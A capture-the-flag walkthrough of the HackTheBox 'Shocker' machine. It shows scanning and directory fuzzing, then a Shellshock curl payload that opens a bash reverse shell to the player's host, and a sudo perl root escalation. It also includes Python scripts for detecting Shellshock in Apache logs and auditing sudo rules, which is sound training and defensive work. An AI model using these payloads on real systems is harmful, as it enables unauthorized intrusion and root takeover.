Explore the fundamentals of cybersecurity in the Shocker Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.56 shocker.htb

Script to add hosts automatically

# Append the hosts entry only if it is not already present, so the script is safe to re-run
ip="10.10.10.56"
domain="shocker.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV shocker.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 21:03 CEST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2014-6271 (Shellshock)

Directory Bruteforcing with dirb

First, run dirb to scan for directories on the target:

dirb http://shocker.htb/

You will find the cgi-bin directory.

Fuzzing for Shellshock Vulnerable Scripts

Use ffuf to fuzz for potentially vulnerable .sh scripts inside the cgi-bin directory:

ffuf -u http://shocker.htb/cgi-bin/FUZZ.sh -c -w /usr/share/dirb/wordlists/small.txt

Exploiting CVE-2014-6271 (Shellshock)

Set up a listener to catch the reverse shell:

nc -lvnp 9001

Then, use curl to exploit the Shellshock vulnerability by sending a malicious User-Agent header. Replace <vpn-ip> with your actual VPN IP so the target can connect back to your listener.

curl -H "User-Agent: () { :;}; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/<vpn-ip>/9001 0>&1'" http://shocker.htb/cgi-bin/user.sh
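The request above works because mod_cgi copies every request header into an environment variable (HTTP_USER_AGENT, HTTP_REFERER, and so on) before running the script, and a vulnerable bash executed whatever followed a "() {" function definition in an exported variable. That makes the pattern easy to hunt for in web server logs. The following detector is an added example, not part of this writeup: it parses Apache combined-format access log lines (the sample lines are constructed here) and flags any line whose client-controlled fields carry the Shellshock trigger.

```python
import re

# Constructed sample lines in Apache "combined" log format (not taken from the
# original writeup). The first and third lines carry a Shellshock-style
# function definition in a header; the second is ordinary browser traffic.
SAMPLE_LOG = """\
10.10.14.2 - - [27/Sep/2024:21:10:01 +0200] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo; /bin/bash -c 'id'"
10.10.14.2 - - [27/Sep/2024:21:10:05 +0200] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.3 - - [27/Sep/2024:21:11:09 +0200] "GET /cgi-bin/status HTTP/1.1" 404 276 "() { :; }; /bin/true" "curl/8.0.1"
"""

# Apache combined format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The CVE-2014-6271 trigger is a function definition "() {" at the start of an
# exported variable's value; mod_cgi turns request headers into HTTP_* variables,
# so any header is a possible carrier. The space between "()" and "{" is
# optional in the vulnerable parser, hence \s*.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Fields of the combined format that come from client-supplied headers or the
# request line and therefore reach the CGI process's environment.
CHECKED_FIELDS = ("agent", "referer", "request")


def parse_line(line):
    """Return the combined-format fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one finding per log line whose client-supplied fields carry a Shellshock pattern."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in CHECKED_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "host": rec["host"],
                    "time": rec["time"],
                    "request": rec["request"],
                    "status": int(rec["status"]),
                    "field": field,
                    "value": rec[field],
                })
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} -> {f['request']} ({f['status']}) in {f['field']}: {f['value']}")
```

Run it against a real /var/log/apache2/access.log by reading the file into find_shellshock. The status code is kept in each finding because a 200 on a cgi-bin path is the one that deserves immediate attention; a 404 still shows someone probing, and the fix in all cases is the same: a patched bash and CGI scripts that do not invoke a shell.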

Accessing the Target System

Once you receive the reverse shell, you can read files such as:

cat /home/shelly/user.txt

Escalating Privileges with Sudo

Check for sudo permissions:

sudo -l

If you see the following entry:

(root) NOPASSWD: /usr/bin/perl

You can escalate privileges by running:

sudo perl -e 'exec "/bin/bash";'

This will give you a root shell.

cat /root/root.txt
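The root step works because a sudo rule that hands an interpreter such as perl to root without a password is equivalent to handing out /bin/bash. As an added example that is not part of this writeup, the script below parses the output of sudo -l (the sample output is constructed here; only the perl rule matches what the box shows) and rates each rule, so an administrator can spot this class of misconfiguration before a CTF player does.

```python
import os
import re

# Constructed sample of `sudo -l` output (not from the original writeup). The
# perl rule is the one the walkthrough finds; the apt-get rule is made up to
# show a command that still prompts for a password.
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update
"""

# One sudo rule as printed by `sudo -l`: "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$')

# Programs that run arbitrary code once started as root; a sudo rule on any of
# these gives the same access as a rule on /bin/bash.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby",
                 "bash", "sh", "dash", "zsh", "vim", "vi"}


def parse_rules(sudo_l_output):
    """Extract runas, tags and command from the command section of `sudo -l` output."""
    rules = []
    in_commands = False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": m.group("cmd")})
    return rules


def audit(sudo_l_output):
    """Rate each rule: 'critical' for password-less root access to a shell-capable program."""
    findings = []
    for rule in parse_rules(sudo_l_output):
        nopasswd = "NOPASSWD" in rule["tags"]
        cmd = rule["cmd"]
        program = os.path.basename(cmd.split()[0])
        # "(root)" or "(ALL)" both allow running as root; "(root : root)" also parses.
        runs_as_root = rule["runas"].split(":")[0].strip() in ("root", "ALL")
        if cmd == "ALL" or (runs_as_root and program in SHELL_CAPABLE and nopasswd):
            severity = "critical"
        elif runs_as_root and program in SHELL_CAPABLE:
            severity = "high"
        else:
            severity = "info"
        findings.append({**rule, "nopasswd": nopasswd, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f"[{f['severity']}] ({f['runas']}) {'NOPASSWD ' if f['nopasswd'] else ''}{f['cmd']}")
```

Feed it the real output with audit(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout) on each host you administer. Anything rated critical should be replaced by a rule on a specific, non-interactive script, or removed.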